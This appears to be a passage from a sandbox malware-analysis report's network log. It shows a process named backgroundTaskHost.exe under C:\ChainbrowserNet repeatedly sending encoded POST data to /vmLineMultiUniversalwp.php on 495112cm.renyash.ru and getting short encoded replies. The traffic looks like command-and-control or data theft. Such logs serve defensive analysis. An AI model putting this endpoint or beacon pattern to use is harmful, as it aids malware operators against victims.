                                                                                          Data Raw: 39 38 0d 0a 02 11 24 1c 28 2e 27 08 21 11 38 1f 3d 10 00 1d 26 0e 2c 11 3b 31 3b 5e 22 3c 2b 12 2f 0b 31 5c 27 20 2c 1b 29 11 01 0c 21 23 20 0d 27 20 2a 5d 06 12 38 5e 2b 2f 25 04 32 38 22 56 3d 32 00 45 26 25 2a 5e 24 03 02 02 3e 3f 31 5d 26 3c 29 56 29 3f 26 58 2d 2a 0a 40 38 3f 30 51 36 13 21 53 08 13 20 1c 31 31 06 0a 28 33 21 5a 26 30 22 02 33 39 28 0f 28 3b 23 0b 24 10 32 5b 2e 57 20 04 28 23 3b 04 2e 58 38 16 3c 2e 23 1f 24 2c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$(.'!8=&,;1;^"<+/1\' ,)!# ' *]8^+/%28"V=2E&%*^$>?1]&<)V)?&X-*@8?0Q6!S 11(3!Z&0"39((;#$2[.W (#;.X8<.#$,"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          43192.168.2.449899104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:18.458326101 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:18.810959101 CET2520OUTData Raw: 51 59 5e 54 50 58 5f 57 5c 5b 52 58 57 5e 58 5f 58 52 5a 5c 52 50 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY^TPX_W\[RXW^X_XRZ\RPQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-**/E48!%4*1Y6=9X&=<!-5+,?&']".=)!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:18.929837942 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:19.200752974 CET810INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:19 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XmAC6JFW2B6lIcP22qAUMMP%2FALhzYrvsaroGpn%2FxGj0YM%2F%2Baz41qcQr12bl5TVLdEu%2B1ChR8z6tACYERgXrtDzRmn4W6UPuieXqbwhubb1v4PDynvEmhvC0EmLp%2BbggIc8R8uFNW"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d35fa984263-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3596&min_rtt=1596&rtt_var=4599&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=82963&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          44192.168.2.449905104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:19.331334114 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:19.686247110 CET2520OUTData Raw: 54 5a 5e 5e 55 5c 5a 52 5c 5b 52 58 57 5e 58 52 58 5c 5a 59 52 54 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^^U\ZR\[RXW^XRX\ZYRTQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.)9(461;)<5["="'#R4>%),+]( "-_)!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:19.784298897 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:20.050760031 CET807INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:20 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aR2VZlQcF4XFrqD4z4rlyGtmsokpF9cp0R%2FwSyTOZzaReFx1oE1%2BFVp4eU43yb6UQd4vAlcohp%2BxZRZgYQv4JsPqDGfBCswsEXrvzF2tO8BhbmD7VqWyNS0a27jjHXQWM%2BzfaZIn"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d3b587d41b4-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=9673&min_rtt=1662&rtt_var=16647&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=22202&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          45192.168.2.449912104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:20.176198959 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:20.529714108 CET2520OUTData Raw: 51 5e 5e 54 55 53 5a 55 5c 5b 52 58 57 52 58 58 58 51 5a 59 52 50 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q^^TUSZU\[RXWRXXXQZYRPQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.B)74%V1U()?%]![*&>R4:<?/^*&#]4>!);!Y#!Y,
                                                                                          Jan 4, 2025 11:08:20.639211893 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:20.837555885 CET808INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:20 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3LrMwF56d2YdzUmi2fWXJV8oQCUy5IDhyY9zL8%2Fl9%2FdQtY59z%2BFznIub5dy%2BUAovkm0KV4iCXiDDwNdGtjsd9FsoY4GaawlfWNvH3%2FVnULstvbtJDTyt6NbApSaJplxXQbP7fRM9"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d40bf594264-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4799&min_rtt=1862&rtt_var=6573&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=57566&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          46192.168.2.449919104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:20.975486994 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:21.326695919 CET2520OUTData Raw: 51 5e 5e 56 55 5d 5a 5c 5c 5b 52 58 57 5b 58 5b 58 50 5a 5b 52 57 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q^^VU]Z\\[RXW[X[XPZ[RWQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.B>_(4;)&4*-"13>Q7>*Q)?0+;#>-)!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:21.435065985 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:21.610618114 CET810INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:21 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I2uq9kVnX%2BgKv85cwzmcYnyQ648sI%2FdjgMv3anntDiz79%2BIuXIbmsl6dMU01DZROvJQnvzUZ9F%2BQBfoSYP2nzv%2Fo0DWePUrNcppUUzlnYQzMIVwYm7l9wk5Np01OyY5O%2B8QdkSTN"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d45aae642da-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4698&min_rtt=1697&rtt_var=6639&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=56787&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          47192.168.2.449925104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:21.737135887 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:22.093280077 CET2520OUTData Raw: 54 58 5b 57 55 58 5a 5c 5c 5b 52 58 57 59 58 52 58 51 5a 5a 52 52 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX[WUXZ\\[RXWYXRXQZZRRQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-)9 (>%#^><)X!Y3$7=:P(;]( "-"*!Y#!Y,*
                                                                                          Jan 4, 2025 11:08:22.191092968 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:22.457642078 CET801INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:22 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ajmSgB2GeogeiHeTpgcXi5TuINV%2B6DCgmACRqOvPmRwzqsIgzCAMuuzxwDig9mkTHkdzjz8hwbUxLod5sXl1e6BIaqVApIgWzoHNVja6ESBzliDjdXlcKbrHvCdKCBg5rNol1llM"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d4a6d3f729b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8004&min_rtt=1983&rtt_var=12787&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=29108&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          48192.168.2.449931104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:22.580794096 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:22.935976982 CET2520OUTData Raw: 54 5a 5e 5e 55 59 5a 56 5c 5b 52 58 57 5b 58 52 58 5c 5a 52 52 54 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^^UYZV\[RXW[XRX\ZRRTQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.E(:/D#(!%#,><!Y!=0X7V >))<(3Z ["Y++!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:23.043191910 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:23.313716888 CET813INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:23 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C1rvvr8N4jiAW%2BEInUDfTVW%2BgwPaZ24%2B8BM5VCnwI%2FwNsMH6PFYbaYFm1OEdsvF0NWkyysB8e%2FYUpij30tFnsw%2FKm0JcdgAIy4MQU9ujG1X7NZ76lqG5wCjauc1m%2FL0QzW4dIlag"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d4fbedb4251-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2930&min_rtt=1656&rtt_var=3170&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=123165&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          49192.168.2.449940104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:23.439585924 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:23.795377970 CET2520OUTData Raw: 54 58 5b 57 55 5d 5a 54 5c 5b 52 58 57 5e 58 53 58 56 5a 5c 52 52 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX[WU]ZT\[RXW^XSXVZ\RRQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.E> 1U#\(,X6=3S7&+/,? 7->);!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:23.903565884 CET25INHTTP/1.1 100 Continue


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          50192.168.2.449942104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:24.005187035 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:24.357947111 CET1844OUTData Raw: 54 59 5e 5f 50 5f 5a 5d 5c 5b 52 58 57 53 58 53 58 56 5a 52 52 54 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TY^_P_Z]\[RXWSXSXVZRRTQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.B='4Q&\=<\6=:'>4..?\(@? .X>!Y#!Y,
                                                                                          Jan 4, 2025 11:08:24.458884954 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:24.716880083 CET959INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:24 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1AVa6elpEfYxMMF%2FeyIO0Q%2FSZRB5mOIYSfxNXFjE%2FB9EHgAh4Attc3azQcj%2B79gsvIrRd7J7yvJ7U9z0rcLiJ8ov%2FUoCNjw6cabh64t4xFHxtDY%2FHsiREooZCFjrw6wYXiCo4n1G"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d589aca4316-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3579&min_rtt=1728&rtt_var=4351&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=88260&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0e 28 58 20 56 21 11 24 5a 2a 58 31 07 26 23 2c 5f 2f 21 33 5a 37 02 3c 00 38 32 31 5c 24 33 3c 1b 2a 06 3f 0e 37 09 33 51 24 0a 2a 5d 06 12 38 5a 28 3c 2a 5c 26 3b 35 0a 29 21 2e 42 30 36 3d 00 30 3d 3f 11 2b 2f 22 02 25 3c 17 54 2a 3f 2a 58 2e 03 20 46 2d 2c 06 12 21 39 21 53 08 13 20 1e 31 22 3f 56 3d 30 14 03 25 23 3a 00 24 29 2b 57 3e 06 0d 0c 33 07 2a 19 3a 0f 0d 5b 3f 0d 28 11 3a 00 30 5e 3c 3d 3f 57 27 3c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'(X V!$Z*X1&#,_/!3Z7<821\$3<*?73Q$*]8Z(<*\&;5)!.B06=0=?+/"%<T*?*X. F-,!9!S 1"?V=0%#:$)+W>3*:[?(:0^<=?W'<"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          51192.168.2.449946104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:24.143675089 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:24.498708963 CET2520OUTData Raw: 54 5d 5e 5e 50 5f 5a 57 5c 5b 52 58 57 59 58 5e 58 51 5a 52 52 57 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T]^^P_ZW\[RXWYX^XQZRRWQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-='4!10'><9":$<7X*V<??^(@+ :Y++!Y#!Y,*
                                                                                          Jan 4, 2025 11:08:24.596453905 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:24.779700041 CET811INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:24 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tDH7rKQz9DROcUFQV%2FsdwUBuAaIQWH%2FkrvOydk%2FnIOT%2B3OBhYHA27DjnJvUxwMYGhC4olkr1aIyVBKn2p2CDXYh2pnl%2B2qdDTbLoUemH%2F3vRXe6GdCJW2zZmNmVJQCA4A6k1piYn"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d5978174207-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7890&min_rtt=1807&rtt_var=12844&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=28925&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          52192.168.2.449952104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:24.920330048 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
